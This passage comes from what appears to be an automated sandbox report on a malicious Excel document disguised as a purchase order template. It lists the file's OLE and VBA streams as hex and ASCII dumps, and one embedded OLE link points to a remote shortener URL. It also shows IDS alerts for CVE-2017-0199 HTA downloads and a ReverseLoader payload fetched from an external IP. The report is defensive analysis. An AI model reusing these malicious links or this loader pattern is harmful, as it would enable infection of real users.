                                                                                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0068D442/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.219515110876372
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD0068D442/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:26243
                                                                                            Entropy:7.635433729726103
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:248
                                                                                            Entropy:3.0523231150355867
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:256
                                                                                            Entropy:4.086306928392587
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:134792
                                                                                            Entropy:7.974168320310173
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                                                            CLSID:
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Stream Size:468
                                                                                            Entropy:5.269289820125323
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                                                            Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:83
                                                                                            Entropy:3.0672749060249043
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:2486
                                                                                            Entropy:3.9244127831265385
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                            Stream Path: MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:536
                                                                                            Entropy:6.330646364694152
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                            Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                            Stream Path: MBD00068A0F/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD00726B69/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.219515110876372
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD00726B69/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:26242
                                                                                            Entropy:7.635424485665502
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Stream Path: MBD00068A0F/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:283872
                                                                                            Entropy:7.743278150467805
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Stream Path: MBD00068A10/\x1Ole, File Type: data, Stream Size: 674
                                                                                            General
                                                                                            Stream Path:MBD00068A10/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:674
                                                                                            Entropy:5.211501021212276
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . 2 - ; . . . . . . . . . . . . ` . . . y . . . K . \\ . . . h . t . t . p . s . : . / . / . s . h . o . r . t . . . r . u . k . s . k . . . c . o . m . / . z . x . r . u . d . b . ? . & . m . i . l . e . = . s . n . o . t . t . y . & . m . e . t . r . o . = . w . o . r . k . a . b . l . e . & . g . a . s . t . r . o . p . o . d . = . a . v . a . i . l . a . b . l . e . & . m . o . n . s . t . e . r . = . r . e . f . l . e . c . t . i . v . e . & . g . e . a . r . s . h . i . f . t . . . e . . + * a b
                                                                                            Data Raw:01 00 00 02 c5 d8 c1 32 ac 2d a6 3b 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 5c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 6f 00 72 00 74 00 2e 00 72 00 75 00 6b 00 73 00 6b 00 2e 00 63 00 6f 00 6d 00 2f 00 7a 00 78 00 72 00 75 00 64 00 62 00 3f 00 26 00 6d 00 69 00 6c 00 65 00 3d 00 73 00 6e 00 6f 00
                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 335347
                                                                                            General
                                                                                            Stream Path:Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:335347
                                                                                            Entropy:7.9986545009414405
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . R - . . P [ 4 . 5 ~ g _ 1 N P k . u , w . > I s . . . . . . . . k . . . \\ . p . b H C U L . . . \\ k } . ? . p 8 C = W d / 3 A q n 9 . & D [ D . . . " . p F P . l n . d . W 3 7 w h $ > [ T . P = . . . B . . . . a . . . k . . . = . . . W S ) i . . . d ! x h . . . . D . . . . 9 . . . . w s . . . . j . . . m . . . . Z = . . . . . I . I 9 , . z L A @ . . . . . . . " . . . . . . . . r . . . . . . . 1 . . . J N } . . , . u ~ Z . I / . t 1 . . . . @ V ; ) X c .
                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 52 bc 2d be 05 d7 b3 f2 90 50 5b 34 0b 35 ec 7e 67 b7 aa f1 5f e5 31 81 ee 4e 50 6b f8 19 75 cf 2c 77 94 b4 0f 80 97 c8 e9 c9 3e 93 49 80 85 73 e1 00 02 00 b0 04 c1 00 02 00 1d 6b e2 00 00 00 5c 00 70 00 f7 62 48 43 55 8f f2 ab 4c 18 16 ca be cb 5c 6b d3 7d 17 8b ae 3f 0e 70 f0 38 f9 43 3d 9b
                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                            CLSID:
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Stream Size:523
                                                                                            Entropy:5.2345232274244715
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:I D = " { D E 1 0 8 E 2 0 - 6 1 4 B - 4 6 4 7 - A 9 3 8 - 7 1 3 9 1 9 2 6 8 6 A E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 9 5 C F A 9 D 3 A 9 D 3 A
                                                                                            Data Raw:49 44 3d 22 7b 44 45 31 30 38 45 32 30 2d 36 31 34 42 2d 34 36 34 37 2d 41 39 33 38 2d 37 31 33 39 31 39 32 36 38 36 41 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:104
                                                                                            Entropy:3.0488640812019017
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:2644
                                                                                            Entropy:3.986387706756239
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:553
                                                                                            Entropy:6.34899372541908
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . E j i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 ca 45 6a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-12-10T06:57:45.530608+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164172.245.142.6080TCP
                                                                                            2024-12-10T06:57:45.530721+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.142.6080192.168.2.2249164TCP
                                                                                            2024-12-10T06:57:50.178973+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166172.245.142.6080TCP
                                                                                            2024-12-10T06:57:50.179073+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1172.245.142.6080192.168.2.2249166TCP
                                                                                            2024-12-10T06:57:58.219043+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167172.245.142.6080TCP
                                                                                            2024-12-10T06:58:13.226642+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249173172.245.142.6080TCP
                                                                                            2024-12-10T06:58:33.137505+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.1.137443192.168.2.2249174TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 10, 2024 06:57:41.914638042 CET49163443192.168.2.2254.150.207.131
